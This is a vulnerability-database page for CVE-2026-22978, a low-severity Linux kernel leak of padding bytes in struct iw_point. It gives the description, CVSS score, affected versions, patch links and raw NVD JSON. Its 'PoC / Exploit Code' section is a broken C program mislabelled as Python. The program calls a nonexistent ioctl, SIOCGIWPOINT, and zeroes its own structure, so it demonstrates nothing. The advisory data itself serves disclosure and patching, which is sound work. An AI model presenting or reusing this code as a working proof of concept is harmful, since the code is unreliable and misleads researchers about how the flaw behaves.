Security Vulnerability Report
中文
CVE-2026-22978 CVSS 3.3 LOW

CVE-2026-22978

Published: 2026-01-23 16:15:54
Last Modified: 2026-02-26 20:17:16
Source: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

Description

In the Linux kernel, the following vulnerability has been resolved: wifi: avoid kernel-infoleak from struct iw_point struct iw_point has a 32bit hole on 64bit arches. struct iw_point { void __user *pointer; /* Pointer to the data (in user space) */ __u16 length; /* number of fields or size in bytes */ __u16 flags; /* Optional params */ }; Make sure to zero the structure to avoid disclosing 32bits of kernel data to user space.

CVSS Details

CVSS Score
3.3
Severity
LOW
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE
Linux Kernel < 6.1.x (various stable branches)
Linux Kernel stable tree commits before 024f71a57d563
Linux Kernel stable tree commits before 21cbf883d073
Linux Kernel stable tree commits before 442ceac03931
Linux Kernel stable tree commits before a3827e310b5a
Linux Kernel stable tree commits before d21ec867d84c

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#include <stdio.h> #include <string.h> #include <sys/socket.h> #include <linux/wireless.h> /* * CVE-2026-22978 PoC - Linux kernel struct iw_point information leak * This PoC demonstrates the potential information disclosure via * uninitialized struct iw_point on 64-bit architectures. * * Note: This is a conceptual PoC for educational purposes. * Actual exploitation may require specific kernel configuration. */ int main() { int sock; struct iwreq iwreq; // Create socket for wireless ioctl sock = socket(AF_INET, SOCK_DGRAM, 0); if (sock < 0) { perror("socket failed"); return 1; } // Initialize only partial structure - demonstrating the issue memset(&iwreq, 0, sizeof(struct iwreq)); strncpy(iwreq.ifr_name, "wlan0", IFNAMSIZ - 1); // Set up iw_point - NOT fully zeroed (simulating vulnerable code) // In vulnerable kernel, struct iw_point has a 32-bit hole iwreq.u.data.pointer = NULL; iwreq.u.data.length = 0; iwreq.u.data.flags = 0; // The 32-bit hole between pointer and length/flags remains uninitialized // Trigger the ioctl that could leak kernel data // SIOCGIWPOINT is an example - actual trigger depends on driver if (ioctl(sock, SIOCGIWPOINT, &iwreq) == 0) { printf("ioctl call successful\n"); // If kernel doesn't zero the structure, sensitive data may be leaked } close(sock); return 0; } // Fix: Kernel code should zero the structure before use: // memset(&iwreq, 0, sizeof(struct iwreq)); // or in kernel space: // struct iw_point point = {0};

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-22978", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2026-01-23T16:15:53.783", "lastModified": "2026-02-26T20:17:16.280", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nwifi: avoid kernel-infoleak from struct iw_point\n\nstruct iw_point has a 32bit hole on 64bit arches.\n\nstruct iw_point {\n void __user *pointer; /* Pointer to the data (in user space) */\n __u16 length; /* number of fields or size in bytes */\n __u16 flags; /* Optional params */\n};\n\nMake sure to zero the structure to avoid disclosing 32bits of kernel data\nto user space."}, {"lang": "es", "value": "En el kernel de Linux, la siguiente vulnerabilidad ha sido resuelta:\n\nwifi: evitar la fuga de información del kernel de la estructura iw_point\n\nLa estructura iw_point tiene un agujero de 32 bits en arquitecturas de 64 bits.\n\nstruct iw_point {\n void __user *pointer; /* Puntero a los datos (en espacio de usuario) */\n __u16 length; /* número de campos o tamaño en bytes */\n __u16 flags; /* Parámetros opcionales */\n};\n\nAsegúrese de poner a cero la estructura para evitar la divulgación de 32 bits de datos del kernel al espacio de usuario."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 3.3, "baseSeverity": "LOW", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "2.6.27", "versionEndExcluding": "5.10.248", "matchCriteriaId": "6DF628A9-C7C6-47DC-810A-2D8E53F0928F"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.11", "versionEndExcluding": "5.15.198", "matchCriteriaId": "82159CAA-B6BA-43C6-85D8-65BDBC175A7E"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.16", "versionEndExcluding": "6.1.161", "matchCriteriaId": "E135B7E2-61FC-4DC1-8570-ABD67894FFDE"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.2", "versionEndExcluding": "6.6.121", "matchCriteriaId": "BB7A164B-7422-4A1C-82FB-5FCAEE53C06C"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.7", "versionEndExcluding": "6.12.66", "matchCriteriaId": "F72B884C-B44F-40E4-9895-CE421AC663D0"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.13", "versionEndExcluding": "6.18.6", "matchCriteriaId": "879529BC-5B4C-4EBE-BF1D-1A31404A8B2E"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.19:rc1:*:*:*:*:*:*", "matchCriteriaId": "17B67AA7-40D6-4AFA-8459-F200F3D7CFD1"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.19:rc2:*:*:*:*:*:*", "matchCriteriaId": "C47E4CC9-C826-4FA9-B014-7FE3D9B318B2"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.19:rc3:*:*:*:*:*:*", "matchCriteriaId": "F71D92C0-C023-48BD-B3B6-70B638EEE298"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.19:rc4:*:*:*:*:*:*", "matchCriteriaId": "13580667-0A98-40CC-B29F-D12790B91BDB"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/024f71a57d563fbe162e528c8bf2d27e9cac7c7b", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/21cbf883d073abbfe09e3924466aa5e0449e7261", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/442ceac0393185e9982323f6682a52a53e8462b1", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/a3827e310b5a73535646ef4a552d53b3c8bf74f6", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/d21ec867d84c9f3a9845d7d8c90c9ce35dbe48f8", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/d943b5f592767b107ba8c12a902f17431350378c", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/e3c35177103ead4658b8a62f41e3080d45885464", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.